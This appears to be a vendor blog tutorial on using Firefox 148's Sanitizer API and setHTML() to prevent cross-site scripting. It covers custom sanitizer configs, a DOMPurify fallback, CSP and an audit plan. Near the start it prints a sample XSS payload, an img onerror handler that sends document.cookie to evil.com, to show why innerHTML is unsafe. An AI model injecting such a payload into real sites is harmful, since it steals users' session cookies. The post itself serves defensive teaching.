opdeck / blog / enhancing-xss-protection-with-sanitizer-api

How to Use the Sanitizer API for Stronger XSS Protection in Firefox 148

April 27, 2026 / OpDeck Team
XSS ProtectionSanitizer APIFirefox SecurityWeb DevelopmentCybersecurity

Cross-site scripting (XSS) has been the bane of web developers for decades. Despite being well-understood, it consistently ranks among the top web vulnerabilities year after year. The root cause is deceptively simple: developers need to insert dynamic HTML into the DOM, and the tools available to do so — primarily innerHTML — have always been a loaded gun. One slip, one piece of untrusted content slipping through, and an attacker can execute arbitrary JavaScript in your users' browsers.

Firefox 148 changes this calculus significantly by shipping the first standardized implementation of the Sanitizer API, introducing a new DOM method called setHTML(). This isn't just a new API for the sake of novelty — it's a fundamental shift in how browsers can help developers handle untrusted HTML safely, by default.

This guide dives deep into what the Sanitizer API actually does, how to use it correctly, what its limitations are, and how it fits into a broader strategy for building secure, performant, and SEO-friendly web applications.


Why innerHTML Has Always Been Dangerous

To understand why setHTML() matters, you need to understand exactly why innerHTML is problematic. When you set innerHTML, the browser parses the provided string as HTML and inserts the resulting DOM nodes. This is fast, convenient, and extremely powerful — which is precisely the problem.

Consider this common pattern:

const userInput = getCommentFromServer(); // untrusted content
document.getElementById('comment').innerHTML = userInput;

If userInput contains something like:

<img src="x" onerror="fetch('https://evil.com/steal?c=' + document.cookie)">

The browser happily executes that onerror handler. The attacker now has your user's session cookie.

Developers have historically dealt with this in a few ways:

  1. Manual sanitization — writing regex-based or string manipulation logic to strip dangerous content. This is notoriously fragile and easy to get wrong.
  2. Third-party libraries — tools like DOMPurify do an excellent job, but they add dependency weight and require keeping up with updates as new attack vectors emerge.
  3. Avoiding innerHTML entirely — using textContent for plain text or building DOM nodes programmatically with createElement. This works but becomes cumbersome for rich content.

None of these solutions is ideal. The browser itself has always had the parsing logic to know what's dangerous — it just never exposed a safe API for developers to use that logic directly.


Introducing the Sanitizer API and setHTML()

The Sanitizer API is a W3C specification that gives developers a browser-native way to sanitize HTML before it touches the DOM. Firefox 148 is the first browser to ship the standardized version of this API.

The core of the API is the setHTML() method on Element, combined with the Sanitizer class. Here's the most basic usage:

const userInput = '<p>Hello <b>world</b></p><script>alert("xss")</script>';
const element = document.getElementById('output');
element.setHTML(userInput);

Even without any configuration, setHTML() strips dangerous elements like <script> tags and event handler attributes like onclick, onerror, and onload. The output in the DOM will be:

<p>Hello <b>world</b></p>

The <script> tag is gone. No configuration required, no third-party library, no regex.

Using the Sanitizer Class for Custom Rules

The default sanitizer is intentionally conservative. For most use cases, the defaults are appropriate. But the API also exposes a Sanitizer class that lets you configure exactly what's allowed:

const sanitizer = new Sanitizer({
  allowElements: ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li'],
  allowAttributes: {
    'a': ['href', 'title'],
  },
  blockElements: ['div'],
  dropElements: ['script', 'style', 'iframe'],
});

element.setHTML(userInput, { sanitizer });

Let's break down the configuration options:

  • allowElements: An explicit allowlist of HTML elements. Only these elements will be kept in the output.
  • allowAttributes: A map of element names to allowed attribute lists. Attributes not in this map are stripped.
  • blockElements: Elements whose tags are removed but whose children are kept. A <div> with children becomes just the children.
  • dropElements: Elements that are removed entirely, including their children.

This level of control is powerful. You can allow rich text formatting for a blog comment system while completely blocking anything that could execute code or leak data.

setHTMLUnsafe() — When You Need to Bypass Sanitization

The API also introduces setHTMLUnsafe(), which works like the old innerHTML — no sanitization is applied. The name is deliberately alarming. It exists for cases where you have already sanitized content server-side and need to insert it without double-processing, or when you're working with fully trusted content.

// Only use this when you are certain the content is safe
element.setHTMLUnsafe(trustedServerRenderedHTML);

Think of setHTMLUnsafe() as innerHTML with a clear warning label. If you find yourself reaching for it with untrusted content, you're doing it wrong.


How the Sanitizer API Compares to DOMPurify

DOMPurify has been the gold standard for client-side HTML sanitization for years, and it's genuinely excellent software. So why does a browser-native API matter?

Performance: DOMPurify works by parsing HTML into a temporary DOM, walking the tree, removing dangerous nodes, and serializing back to a string. The Sanitizer API integrates directly into the browser's HTML parser pipeline, avoiding the serialization step entirely. For applications that sanitize large volumes of content — comment feeds, rich text editors, CMS previews — this can be a meaningful performance improvement.

Security surface area: DOMPurify is maintained by a small team and requires updates when new attack vectors are discovered. A browser-native implementation is maintained by the browser vendor's security team, gets updated with browser updates, and benefits from the same scrutiny applied to the browser's own security model.

No dependency: One less dependency means one less attack surface for supply chain attacks, one less thing to update, and one less bundle size concern.

Standardization: Because the Sanitizer API is a W3C standard, behavior will eventually be consistent across all browsers. DOMPurify has some browser-specific quirks and edge cases.

That said, DOMPurify still has advantages right now:

  • Browser support: The Sanitizer API is currently only in Firefox 148+. Chrome and Safari have not yet shipped the standardized version. For production use today, you still need DOMPurify as a fallback.
  • Maturity: DOMPurify has been battle-tested against an enormous range of attack payloads over many years.

The pragmatic approach is to use the Sanitizer API where available and fall back to DOMPurify:

function safeSetHTML(element, html, sanitizerConfig = {}) {
  if (typeof element.setHTML === 'function') {
    const sanitizer = Object.keys(sanitizerConfig).length 
      ? new Sanitizer(sanitizerConfig) 
      : undefined;
    element.setHTML(html, sanitizer ? { sanitizer } : {});
  } else {
    // DOMPurify fallback
    element.innerHTML = DOMPurify.sanitize(html);
  }
}

XSS Protection as Part of a Broader Security Strategy

The Sanitizer API is a powerful tool, but it's not a complete XSS defense on its own. It handles the client-side DOM insertion problem. A comprehensive XSS strategy also needs:

Content Security Policy (CSP)

CSP is an HTTP response header that tells the browser which sources of scripts, styles, and other resources are trusted. Even if an attacker somehow injects a script, a well-configured CSP can prevent it from executing.

Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'; object-src 'none';

CSP is your defense in depth. The Sanitizer API prevents injection; CSP limits the damage if injection somehow occurs.

Server-Side Sanitization

Never rely solely on client-side sanitization for content that gets stored and served to other users. If a user submits a comment, sanitize it on the server before storing it in your database. Libraries like bleach (Python), sanitize-html (Node.js), or HtmlSanitizer (.NET) handle this.

Client-side sanitization with the Sanitizer API is your last line of defense before DOM insertion, not your only line.

Security Headers Audit

Beyond CSP, several other HTTP security headers contribute to XSS defense:

  • X-Content-Type-Options: nosniff — prevents MIME type sniffing that can lead to script execution
  • X-Frame-Options: DENY or SAMEORIGIN — prevents clickjacking
  • Referrer-Policy — controls referrer information leakage

You can check all of these headers quickly using the Vulnerability Scanner on OpDeck, which audits your security headers and flags common misconfigurations.


Impact on SEO and Performance

Security changes sometimes have unintended consequences for SEO and performance. Here's what you need to know about the Sanitizer API in that context.

SEO Considerations

The Sanitizer API operates entirely client-side, at DOM insertion time. It has no effect on the HTML that search engine crawlers receive when they fetch your page. If you're rendering content server-side (SSR) or pre-rendering, the sanitized output never appears in the initial HTML response.

However, if you're building a single-page application where content is fetched and injected client-side, the Sanitizer API affects what ends up in the DOM that JavaScript-capable crawlers like Googlebot see. Since the sanitizer removes dangerous elements but preserves legitimate content, there should be no negative SEO impact — in fact, cleaner HTML can only help.

For content-heavy applications, running an SEO Audit after implementing the Sanitizer API is a good sanity check to confirm that important content — headings, links, body text — is being preserved correctly after sanitization.

Performance Impact

Replacing innerHTML with setHTML() should be a performance neutral-to-positive change. The browser-native implementation avoids the overhead of a JavaScript-based sanitization library. For applications doing heavy DOM manipulation — think real-time comment feeds, collaborative editors, or content dashboards — the reduced CPU time can meaningfully improve rendering performance.

You can measure before and after using the Website Performance Analyzer, which runs Lighthouse-based audits and surfaces JavaScript execution time, main thread blocking, and time-to-interactive metrics.

Caching Considerations

The Sanitizer API itself doesn't affect HTTP caching. But if you're moving sanitization from server-side to client-side as part of a refactor, make sure your API responses that return raw HTML are still being cached appropriately. Raw, unsanitized HTML from an API should typically not be cached in a CDN without careful thought about cache poisoning risks.

Use the Cache Inspector to verify that your API responses and static assets have the correct Cache-Control, ETag, and Vary headers.


Practical Implementation Guide

Here's a step-by-step approach to adopting the Sanitizer API in a real application.

Step 1: Audit Your innerHTML Usage

Search your codebase for every use of innerHTML that involves dynamic content:

grep -rn "innerHTML\s*=" src/ --include="*.js" --include="*.ts" --include="*.jsx" --include="*.tsx"

For each occurrence, ask: is this content trusted (hardcoded or from your own templates), or is it dynamic (from user input, an API, or a database)?

Step 2: Categorize and Prioritize

  • Trusted, static content: Leave as-is or switch to setHTMLUnsafe() for clarity.
  • Dynamic content from your own API with server-side sanitization: Consider setHTMLUnsafe() with a comment explaining the trust chain.
  • Untrusted user content: Replace with setHTML() immediately.

Step 3: Define Your Sanitizer Configurations

Don't use one global sanitizer for everything. Define configurations based on context:

// For rich text blog comments
const commentSanitizer = new Sanitizer({
  allowElements: ['p', 'b', 'i', 'em', 'strong', 'a', 'blockquote', 'code', 'pre', 'ul', 'ol', 'li'],
  allowAttributes: { 'a': ['href', 'rel'] },
});

// For simple user display names (no HTML at all)
const plainTextSanitizer = new Sanitizer({
  allowElements: [],
});

// For admin-controlled content that can include media
const richMediaSanitizer = new Sanitizer({
  allowElements: ['p', 'div', 'img', 'figure', 'figcaption', 'h2', 'h3', 'ul', 'ol', 'li', 'a', 'b', 'i'],
  allowAttributes: {
    'img': ['src', 'alt', 'width', 'height'],
    'a': ['href', 'rel', 'target'],
  },
});

Step 4: Implement with Fallback

Use the progressive enhancement pattern shown earlier to support both Firefox 148+ and other browsers.

Step 5: Test Against Known XSS Payloads

Run your implementation against a payload list. The OWASP XSS Filter Evasion Cheat Sheet is a good resource. Verify that your sanitizer configuration blocks all payloads while preserving legitimate content.


What's Coming Next

The Sanitizer API specification is still evolving. Future additions being discussed include:

  • sanitizeFor(): A method that sanitizes HTML for a specific target element type, returning a DocumentFragment rather than modifying an element directly.
  • Trusted Types integration: The Sanitizer API is designed to work alongside the Trusted Types API, which prevents DOM XSS by requiring that strings be explicitly marked as trusted before being assigned to dangerous sinks like innerHTML.
  • Cross-browser support: Chrome has been working on an implementation, and Safari will follow. The standardization effort means that once all major browsers ship, the Sanitizer API becomes a baseline feature with no polyfill needed.

Conclusion

The Sanitizer API and setHTML() represent a meaningful step forward in the web platform's built-in security capabilities. By moving HTML sanitization from userland JavaScript libraries into the browser itself, Firefox 148 gives developers a faster, more maintainable, and more trustworthy way to handle untrusted content.

The practical path forward is clear: audit your innerHTML usage, replace dynamic insertions with setHTML() where supported, maintain a DOMPurify fallback for other browsers, and layer in CSP and server-side sanitization for defense in depth.

Security, performance, and SEO are not competing concerns — they reinforce each other. Cleaner, sanitized HTML is better for crawlers, faster to parse, and safer for users.

If you want to audit your site's current security posture, check your caching configuration, or run an SEO analysis, OpDeck has the tools to do it in minutes — no setup required.